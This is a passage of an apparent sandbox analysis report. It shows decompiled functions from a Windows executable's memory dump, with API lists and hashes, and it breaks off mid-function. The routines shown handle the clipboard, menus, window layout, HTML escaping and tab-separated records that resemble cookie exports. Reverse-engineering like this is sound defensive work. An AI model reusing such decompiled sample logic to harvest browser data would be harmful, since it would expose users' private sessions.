                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2468767547-0
                                                                                                                                                                    • Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                                    • Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                                    • Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				void* _v12;
                                                                                                                                                                    				long _v16;
                                                                                                                                                                    				void* _t17;
                                                                                                                                                                    				void* _t32;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    				long _t39;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                    				EmptyClipboard();
                                                                                                                                                                    				_t17 = E00405338(_a4);
                                                                                                                                                                    				_v12 = _t17;
                                                                                                                                                                    				if(_t17 == 0xffffffff) {
                                                                                                                                                                    					_v8 = GetLastError();
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t39 = GetFileSize(_t17, 0);
                                                                                                                                                                    					_t5 = _t39 + 2; // 0x2
                                                                                                                                                                    					_t32 = GlobalAlloc(0x2000, _t5);
                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                    						L4:
                                                                                                                                                                    						_v8 = GetLastError();
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t37 = GlobalLock(_t32);
                                                                                                                                                                    						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
                                                                                                                                                                    							GlobalUnlock(_t32);
                                                                                                                                                                    							SetClipboardData(0xd, _t32);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					CloseHandle(_v12);
                                                                                                                                                                    				}
                                                                                                                                                                    				CloseClipboard();
                                                                                                                                                                    				return _v8;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405563
                                                                                                                                                                      • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040559E
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004055C3
                                                                                                                                                                    • SetClipboardData.USER32 ref: 004055CC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055D4
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004055E0
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055EB
                                                                                                                                                                    • CloseClipboard.USER32 ref: 004055F4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                    • Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                                    • Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                                    • Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                    			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				struct _SYSTEMTIME _v88;
                                                                                                                                                                    				void* _v92;
                                                                                                                                                                    				struct _FILETIME _v96;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                    				char* _t44;
                                                                                                                                                                    				void* _t56;
                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                    				long _t90;
                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                    
                                                                                                                                                                    				_t97 = __esi;
                                                                                                                                                                    				_t81 =  *((intOrPtr*)(__esi + 0x10));
                                                                                                                                                                    				_t91 = _a4;
                                                                                                                                                                    				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
                                                                                                                                                                    				_t77 = 0x40f454;
                                                                                                                                                                    				if(_t29 != 0) {
                                                                                                                                                                    					_t77 = _t29;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t99 = _t98 | 0xffffffff;
                                                                                                                                                                    				_t106 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                                    				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
                                                                                                                                                                    					E004063DD(_t99, _t81, _t91, _t106, ".");
                                                                                                                                                                    				}
                                                                                                                                                                    				E004063DD(_t99, _t81, _t91, _t106, _t77);
                                                                                                                                                                    				_t78 = "\t";
                                                                                                                                                                    				E004063DD(_t99, _t81, _t91, _t106, "\t");
                                                                                                                                                                    				_t107 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                                    				_t34 = _t99;
                                                                                                                                                                    				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
                                                                                                                                                                    					_push(L"FALSE");
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push(L"TRUE");
                                                                                                                                                                    				}
                                                                                                                                                                    				E004063DD(_t34, _t81, _t91, _t107);
                                                                                                                                                                    				E004063DD(_t99, _t81, _t91, _t107);
                                                                                                                                                                    				_t82 =  *((intOrPtr*)(_t97 + 0x14));
                                                                                                                                                                    				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
                                                                                                                                                                    				_t108 = _t39;
                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                    					_t39 = 0x40f454;
                                                                                                                                                                    				}
                                                                                                                                                                    				E004063DD(_t99, _t82, _t91, _t108, _t39);
                                                                                                                                                                    				E004063DD(_t99, _t82, _t91, _t108, _t78);
                                                                                                                                                                    				_t109 =  *(_t97 + 0x40) & 0x00000001;
                                                                                                                                                                    				_t44 = L"TRUE";
                                                                                                                                                                    				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                                    					_t44 = L"FALSE";
                                                                                                                                                                    				}
                                                                                                                                                                    				E004063DD(_t99, _t82, _t91, _t109, _t44);
                                                                                                                                                                    				E004063DD(_t99, _t82, _t91, _t109, _t78);
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                    				_v88.wYear = 0x7b2;
                                                                                                                                                                    				_v88.wDay = 1;
                                                                                                                                                                    				_v88.wMonth = 1;
                                                                                                                                                                    				SystemTimeToFileTime( &_v88,  &_v96);
                                                                                                                                                                    				_t90 = _v96.dwLowDateTime;
                                                                                                                                                                    				asm("sbb ecx, edi");
                                                                                                                                                                    				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
                                                                                                                                                                    				_push(_t90);
                                                                                                                                                                    				_push(_t56);
                                                                                                                                                                    				_push(L"%I64d");
                                                                                                                                                                    				_push(0x1f);
                                                                                                                                                                    				_push( &_v88);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				_t96 = _v20;
                                                                                                                                                                    				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
                                                                                                                                                                    				_t80 = "\t";
                                                                                                                                                                    				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
                                                                                                                                                                    				_t85 =  *((intOrPtr*)(_t97 + 0x18));
                                                                                                                                                                    				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
                                                                                                                                                                    				_t110 = _t64;
                                                                                                                                                                    				if(_t64 == 0) {
                                                                                                                                                                    					_t64 = 0x40f454;
                                                                                                                                                                    				}
                                                                                                                                                                    				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
                                                                                                                                                                    				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
                                                                                                                                                                    				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
                                                                                                                                                                    				_t111 = _t70;
                                                                                                                                                                    				if(_t70 == 0) {
                                                                                                                                                                    					_t70 = 0x40f454;
                                                                                                                                                                    				}
                                                                                                                                                                    				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
                                                                                                                                                                    			}























                                                                                                                                                                    APIs
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 0040239D
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004023B0
                                                                                                                                                                      • Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
                                                                                                                                                                      • Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
                                                                                                                                                                    • String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
                                                                                                                                                                    • API String ID: 1007903050-2074899967
                                                                                                                                                                    • Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                                    • Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
                                                                                                                                                                    • Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                                    • Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                    			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
                                                                                                                                                                    				wchar_t* _v0;
                                                                                                                                                                    				int _v4;
                                                                                                                                                                    				int _t39;
                                                                                                                                                                    				wchar_t* _t49;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				int _t67;
                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                    
                                                                                                                                                                    				_t59 = __ecx;
                                                                                                                                                                    				_t71 = _t70 & 0xfffffff8;
                                                                                                                                                                    				E0040E340(0x404c, __ecx);
                                                                                                                                                                    				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                                                                                                                    				_a4 = _t39;
                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                    				if(_t39 <= 0) {
                                                                                                                                                                    					L15:
                                                                                                                                                                    					return _t39;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					do {
                                                                                                                                                                    						memset( &_a58, 0, 0x2000);
                                                                                                                                                                    						_t71 = _t71 + 0xc;
                                                                                                                                                                    						_a44 =  &_a56;
                                                                                                                                                                    						_a8.cbSize = 0x30;
                                                                                                                                                                    						_a12 = 0x36;
                                                                                                                                                                    						_a48 = 0x1000;
                                                                                                                                                                    						_a56 = 0;
                                                                                                                                                                    						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                                                                                                                    							goto L14;
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a56 == 0) {
                                                                                                                                                                    							L12:
                                                                                                                                                                    							_t80 = _a28;
                                                                                                                                                                    							if(_a28 != 0) {
                                                                                                                                                                    								_push(0);
                                                                                                                                                                    								_push(_a28);
                                                                                                                                                                    								_push(_a4);
                                                                                                                                                                    								E0040699E(_t59, _t80);
                                                                                                                                                                    								_t71 = _t71 + 0xc;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L14;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t67 = _a24;
                                                                                                                                                                    						_a8256 = 0;
                                                                                                                                                                    						memset( &_a8258, 0, 0x2000);
                                                                                                                                                                    						_t49 = wcschr( &_a56, 9);
                                                                                                                                                                    						_t71 = _t71 + 0x14;
                                                                                                                                                                    						_v0 = _t49;
                                                                                                                                                                    						if(_a28 != 0) {
                                                                                                                                                                    							if(_a12 == 0) {
                                                                                                                                                                    								 *0x412c34 =  *0x412c34 + 1;
                                                                                                                                                                    								_t68 =  *0x412c34; // 0x0
                                                                                                                                                                    								_t67 = _t68 + 0x11558;
                                                                                                                                                                    								__eflags = _t67;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t67 = _v4 + 0x11171;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t51 = E00406D16(_t67,  &_a8256);
                                                                                                                                                                    						_pop(_t59);
                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                    							if(_v0 != 0) {
                                                                                                                                                                    								wcscat( &_a8256, _v0);
                                                                                                                                                                    								_pop(_t59);
                                                                                                                                                                    							}
                                                                                                                                                                    							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    						L14:
                                                                                                                                                                    						_v4 = _v4 + 1;
                                                                                                                                                                    						_t39 = _v4;
                                                                                                                                                                    					} while (_t39 < _a4);
                                                                                                                                                                    					goto L15;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                    • Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                                    • Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                                    • Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                    			E00402754(void* __ecx) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				struct HWND__* _t6;
                                                                                                                                                                    				_Unknown_base(*)()* _t11;
                                                                                                                                                                    				struct HWND__* _t15;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                    
                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                    				_v8 = 0xff;
                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                    				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					__imp__#17();
                                                                                                                                                                    					_t6 = 1;
                                                                                                                                                                    					L6:
                                                                                                                                                                    					if(_t6 != 0) {
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                                                    					_t20 = 1;
                                                                                                                                                                    					_t15 =  *_t11( &_v12);
                                                                                                                                                                    				}
                                                                                                                                                                    				FreeLibrary(_t23);
                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                    					goto L5;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t6 = _t15;
                                                                                                                                                                    					goto L6;
                                                                                                                                                                    				}
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                                    • #17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                    • Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                                    • Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
                                                                                                                                                                    • Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                    				struct HWND__* _v12;
                                                                                                                                                                    				struct tagRECT _v28;
                                                                                                                                                                    				struct tagRECT _v44;
                                                                                                                                                                    				int _t50;
                                                                                                                                                                    				long _t61;
                                                                                                                                                                    				struct HDC__* _t63;
                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                    				struct HWND__* _t71;
                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    				int _t74;
                                                                                                                                                                    				int _t80;
                                                                                                                                                                    				int _t83;
                                                                                                                                                                    
                                                                                                                                                                    				_t73 = __edx;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_t74 = GetSystemMetrics(0x11);
                                                                                                                                                                    				_t80 = GetSystemMetrics(0x10);
                                                                                                                                                                    				if(_t74 == 0 || _t80 == 0) {
                                                                                                                                                                    					_t63 = GetDC(0);
                                                                                                                                                                    					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                                                                    					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                                                                    					ReleaseDC(0, _t63);
                                                                                                                                                                    				}
                                                                                                                                                                    				GetWindowRect(_a4,  &_v44);
                                                                                                                                                                    				if((_a8 & 0x00000004) != 0) {
                                                                                                                                                                    					_t71 = GetParent(_a4);
                                                                                                                                                                    					if(_t71 != 0) {
                                                                                                                                                                    						_v28.left = _v28.left & 0x00000000;
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						GetWindowRect(_t71,  &_v28);
                                                                                                                                                                    						_t61 = _v28.left;
                                                                                                                                                                    						_t72 = _v28.top;
                                                                                                                                                                    						_t80 = _v28.right - _t61 + 1;
                                                                                                                                                                    						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                                                                    						_v8 = _t61;
                                                                                                                                                                    						_v12 = _t72;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t65 = _v44.right;
                                                                                                                                                                    				if((_a8 & 0x00000001) == 0) {
                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                    					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t83 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t68 = _v44.bottom;
                                                                                                                                                                    				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                    					L11:
                                                                                                                                                                    					_t50 = 0;
                                                                                                                                                                    					goto L12;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                    					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                                                                    					if(_t50 >= 0) {
                                                                                                                                                                    						L12:
                                                                                                                                                                    						if(_t83 < 0) {
                                                                                                                                                                    							_t83 = 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				}
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00405B30
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00405B36
                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00405B43
                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
                                                                                                                                                                    • ReleaseDC.USER32 ref: 00405B62
                                                                                                                                                                    • GetWindowRect.USER32 ref: 00405B75
                                                                                                                                                                    • GetParent.USER32(?), ref: 00405B80
                                                                                                                                                                    • GetWindowRect.USER32 ref: 00405B9D
                                                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                    • Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                                    • Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
                                                                                                                                                                    • Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                                    • Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                                    			E0040DBDA(signed short* __eax, void* __ecx) {
                                                                                                                                                                    				void* _t2;
                                                                                                                                                                    				signed short* _t3;
                                                                                                                                                                    				void* _t7;
                                                                                                                                                                    				void* _t8;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    
                                                                                                                                                                    				_t3 = __eax;
                                                                                                                                                                    				_t8 = __ecx;
                                                                                                                                                                    				_t7 = 8;
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                                                                    					if(_t2 != 0x3c) {
                                                                                                                                                                    						goto L3;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_t7);
                                                                                                                                                                    					_push(L"&lt;");
                                                                                                                                                                    					L14:
                                                                                                                                                                    					_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                    					_t10 = _t10 + 0xc;
                                                                                                                                                                    					_t8 = _t8 + _t7;
                                                                                                                                                                    					L16:
                                                                                                                                                                    					if( *_t3 != 0) {
                                                                                                                                                                    						_t3 =  &(_t3[1]);
                                                                                                                                                                    						continue;
                                                                                                                                                                    					}
                                                                                                                                                                    					return _t2;
                                                                                                                                                                    					L3:
                                                                                                                                                                    					if(_t2 != 0x3e) {
                                                                                                                                                                    						if(_t2 != 0x22) {
                                                                                                                                                                    							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                                                                    								if(_t2 != 0x26) {
                                                                                                                                                                    									if(_t2 != 0xa) {
                                                                                                                                                                    										 *_t8 = _t2;
                                                                                                                                                                    										_t8 = _t8 + 2;
                                                                                                                                                                    									} else {
